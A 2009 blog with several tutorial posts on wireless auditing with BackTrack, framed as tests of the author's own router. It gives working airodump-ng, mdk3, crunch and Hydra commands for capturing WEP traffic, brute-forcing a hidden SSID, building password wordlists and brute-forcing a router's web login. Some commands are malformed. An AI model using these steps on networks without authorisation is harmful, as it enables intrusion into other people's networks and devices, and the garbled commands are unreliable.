Sunday, 17 May 2009

Using airodump-ng to monitor wireless networks

When checking wireless networks, one of the first things I use is airodump.

Kismet is also a fantastic tool, however I find that airodump is good to find info quickly and you are able to quickly apply filters to narrow down your search easily.
Kismet on the other hand is able to give other information such as IP ranges, hidden ssids (given enough time) and can also function as an IDS, so all depends what you want to do / what you need.

In my case I am using an Asus eeepc with an Atheros wireless interface and am using trusty 'ol Back|Track3 Final on a live-usb.
My test setup is a router with hidden SSID with 128bit WEP encryption.

The atheros chipset has a so-called master interface and virtual access points or VAPs.
What we do is use the master interface (in this case wifi0) to create virtual interfaces.

The first action to take is to check what wireless interfaces are up and to put your wireless card into monitor mode.

Open up a terminal and do the below ;


airmon-ng start wifi0

Now I have 2 working VAPs,
ath0 & ath1

ath0 is in managed mode
ath1 is in monitor mode

Now our card is in monitor mode (this can be checked by doing an iwconfig).

iwconfig ath1

To start airodump, simply type in the terminal

airodump-ng ath1

airodump will run without any filters showing all networks within range.
Some access points / routers are set to send beacons at a lower speed than normal, with the channels hopping as quickly as they are in standard mode, it can take a while for airodump to find the AP.
We can adjust the channel hopping speed by using the -f command;
To keep the results on the display for longer you can adjust the time limit with the --berlin option.
Now airodump will only change channels every 2000 milliseconds (2 seconds) and keep the results on the display for 600 seconds.

airodump-ng ath1 -f 2000 --berlin 600

If you are looking specifically for an open network or a wep network, you can filter the results using the -t option and to only have clients listed which are connected to networks, apply the -a filter.

airodump-ng ath1 -f 2000 --berlin 600 -t OPN -t WEP -a

(hard to believe people actually still use WEP ! but they do..)

Now to limit the results to the test network, we filter it down to show only the results for my test network using the --bssid command. The other filter options can be removed as we will be limiting the view to a single access point only.
Best to also lock the channel to the channel the test network is using with the -c command.

airodump-ng ath1 -a -c 2 --bssid 00:13:D4:09:32:60

To write all packets to a file we add the -w command, this will capture all the dta packets from the access point which can be used (when enough packets have been captured) to crack the WEP key.
airodump-ng ath1 -a -c 2 --bssid 00:13:D4:09:32:60 -w test

To save only the captured ivs (which will enable a quicker wep crack, if you have sufficient!) add the --ivs option.
airodump-ng ath1 -a -c 2 --bssid 00:13:D4:09:32:60 -w test --ivs

If you want to have airodump check 3 specific channels only (for instance channels 4, 7 & 11), this can also be specified with the -c command ;
airodump-ng ath1 -c 4,7,11

Video showing the above;

Information on airodump-ng can be found here.

Monday, 11 May 2009

Wordlists and Wordlist manipulation - Part 2

A wordlist revisited post post can be found here ;

Some tools for creating / editting wordlists;

Crunch is a pretty easy yet powerful dictionary generator with general usage;
pentest/password/crunch [from length] [to length] [charset] > filename.txt

If you want a 4 character password list with just numbers the code is;
/pentest/passward/crunch 4 4 0123456789 > pass1.txt
If you want a 6 character password list with lowercase and numbers, the code is;
/pentest/password/crunch 6 6 abcdefghijklmnopqrstuvwxyz0123456789 > pass2.txt

You can also fix parts of the passwords; if for instance you are think the password will always start off with for instance "pass" followed by numbers, you can use crunch to do the work for you.
/pentest/password/crunch 8 8 0123456789 -t pass@@@@ > password.txt

That still results in a file with 10000 possible combinations though.. can check the number of lines with ;
cat password.txt | wc -l

The syntax for crunch gets slightly more complicated when dealing with special characters.
If for instance you wanted to make a five character wordlist with all possible special characters, you would need to 'escape' certain special characters using backslash \

If you wanted to fix certain characters, using the -t function, then again, you would need to escape certain characters, ie ;

/pentest/password/crunch 5 5 "\`\~\!@#$%^&*()-_=+[{]};:'\"\|,<.>/?" -t "@@\"\\@"

Using SED

Sed is short for StreamEditor, and although extremely powerful.. not easy to use and definately too complicated for me.. So herewith just an example;

You can copy the contents of a webpage with a simple 'select all' and 'copy', paste this into a txt file, save txt file (web.txt) ;

Transform a space into a new line;
sed 'se[[:space:]]e\neg' -i web.txt

Remove empty lines;
sed '/^$/d' -i web.txt

Then sort alphabetically and exclude duplicates;
cat web.txt | sort | uniq > web_sorted_uniq.txt

So with just a Ctrl + A, Copy & Paste and 3 lines of code you have a wordlist of all words on
a specific webpage.
Obviously some websites are better suited for this than others, however it is still a quick and dirty way to get a decently focussed wordlist and you can then clean it up further with sed commands and password inspector (see lower down in the post).

To remove any periods from the front of the words;
sed 's/^[.]//' -i web.txt

To remove any comma from the end of the words;
sed 's/[,]$//' -i web.txt

Appending characters to each word in wordlist (such as '123');
sed 's/$/123/' wordlist.txt > wordlist123.txt

To delete lines in file containing certain character (containing "?");
sed '/?/ d' -i wordlist.txt

or to create a new file with those changes;
sed '/?/ d' wordlist.txt > wordlist1.txt

Some good information on SED usage can be found here.

The 'tr' command is handy as well, for instance to change upper to lower case or vice versa;
tr [:upper:] [:lower:] <> wordlist_lower.txt

Information can be found here.

Using Wget & Wyd

This is much more refined way of getting words from a website, even going down several layers in the website.

First we make a folder and move to it;
mkdir tr
cd tr

Then we start wget to grap all from a site, specifying how deep we want to go (-l)
wget -r -l 1 -nd

Then to go to wyd and use it to extract all words from the downloaded files.
cd /pentest/password/wyd
perl -n -o ~/wordlistTR.txt ~/TR/

Head back to root
cd ~/
cat wordlistTR.txt | sort | uniq > TR_sorted_uniq.txt

So now we have a txt file with all words from the 1st level of in alphabetical order without duplicates.

Its handy to remember that the 'sort' function bases the sorting on the order as defined in the ASCII table and so will sort ABCabc instead of AaBbCc.
To get a real alphabetical sorting order, use the -f command;

cat wordlistTR.txt | sort -f | uniq > TR_sorted_uniq.txt

Password Inspector
You can use Password inspector to tidy up wordlist files based on minimum and maximum password length and which character set you want it to contain.

cat TR_sorted_uniq.txt | pw-inspector -m 4 -M 15 > TR_optimised.txt

So the above some ways to get wordlists and how to manipulate them to your liking !

Wordlists and Wordlist manipulation - Part 1

A crucial part of checking PC / Network security is having decent sets of wordlists.

There are a lot out there on the net, however a lot are not really worth much and some need a lot of work to make them usable.
Larger wordlists do not always mean better.

For checking router logins and passwords, it is always worth your while to first run through the makers default login & passwords.
How to figure out the make of the router ? Well two options have worked for me;

When running Kismet, it will on occasion be able to show the manufacturer of the wireless router.

Open up Kismet (from shell)
Sort by BSSID (type 's' followed by 'b')
"s" --> "b"
Select the network of interest and hit 'enter' to see more details on the network.
If you are in luck the Manufacturer will be shown.

An alternative means is to look up the manufacturer based on the BSSID MAC address.

Get the BSSID mac by using either 'airodump' or Kismet.

Then ;
The website ; will allow a lookup of MAC addresses and show you the manufacturer of same.

You can then check the default login / passwords on either;
[if you speak a bit of french ;) ]
This should be your first check before trying time-consuming brute-force cracking with hydra or medusa.

As shown in previous posts, mdk3 can be used to crack hidden ssids. A brute force option is available but in reality takes a loong time for ssids of over 3 or 4 characters.
It takes around 35min to try all printable characters for a 3 character ssid on my test setup.

Having a good wordlist is much better, however if the essid is not in the wordlist.. your outta luck.

There is a custom ssid wordlist based on the Shmoo Groups ssid list for WPA tables, which can be found here;

For instance, I have taken that list and add new ssids which I get when out and about with my trusty old PDA running WifiFofum.
(Now running at over 4000 of SSIDs seen to be used)

Plenty of wordlists can also be found on;

Church of Wifi WPA tables

And of course ...
Google is your friend :)

But what if you want to create a custom made wordlist for a specific job / test ?

I'll try to elaborate a bit more on that in part 2..

Using Hydra after connecting to network

After gaining access to your network, you can check the strength of your router's access passwords by using a tool called Hydra from THC.
Hydra is a login / password bruteforce cracker which uses password/dictionary files.

First we find our network and do what is needed to log in
In this case my test setup is;
* Eee PC 900, using the built in Atheros wireless.
* Open network with hidden SSID on channel 3, no clients attached, no mac filtering enabled.

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0 -f 1500 -t OPN -a
(using the -f function to slow down the channel hopping and -t option to filter out open networks)

After finding the network and relevant info with airodump, I'll use my custom ssid wordlist to crack the hidden ssid ;
mdk3 ath0 p -c 2 -t 00:13:D4:09:32:60 -f /mnt/sda1/ssid.txt -s 50
Depending on how often the AP sends beacons it can take a while to start, it will also show other networks broadcasting.

So now we have all the info we need to connect to this open network.
We start by stopping the wireless interface which is now still in monitor mode and
recreate in managed mode and then enter in the information we have acquired to access network and check for success;

airmon-ng stop ath0
wlanconfig ath0 create wlandev wifi0 wlanmode sta
iwconfig ath0 channel 2 essid TEST ap 00:13:D4:09:32:60
ifconfig ath0 up
iwconfig ath0

Success ! (see link quality? we have a connection!)

Now to see whether the AP has DHCP enabled so we can automatically get an IP address using dhcpcd with the -t option to give a time limit and the -d to give some extra info on our MAC and IP address when given.
When successful we can do a netstat to see what IP address the router is using (gateway);

dhcpcd -t 30 -d ath0
netstat -nr

So now we know that the router can be found on IP address, lets try to log in using some standard password combinations..

No luck..

OK, so now we will attempt to use Hydra.
Note the address line in the browser;
I have wordlists stored on my sda1 drive which have been prepared using a combination of default passwords and regularly used ones.

hydra -L /mnt/sda1/login.txt -P /mnt/sda1/password.txt -t 2 -e ns -f http-get /index.asp
This can take a while, and so to speed things up I tweaked my custom wordlist a bit.

Success !

So now using the above found working login and password, we try to login again;

We're in !

So now we are in the router and can make changes as we see fit !
And make sure that the security is increased..

Here is a video showing going from cracking a hidden ssid, cracking WEP encryption and hacking the router;
Google Analytics Alternative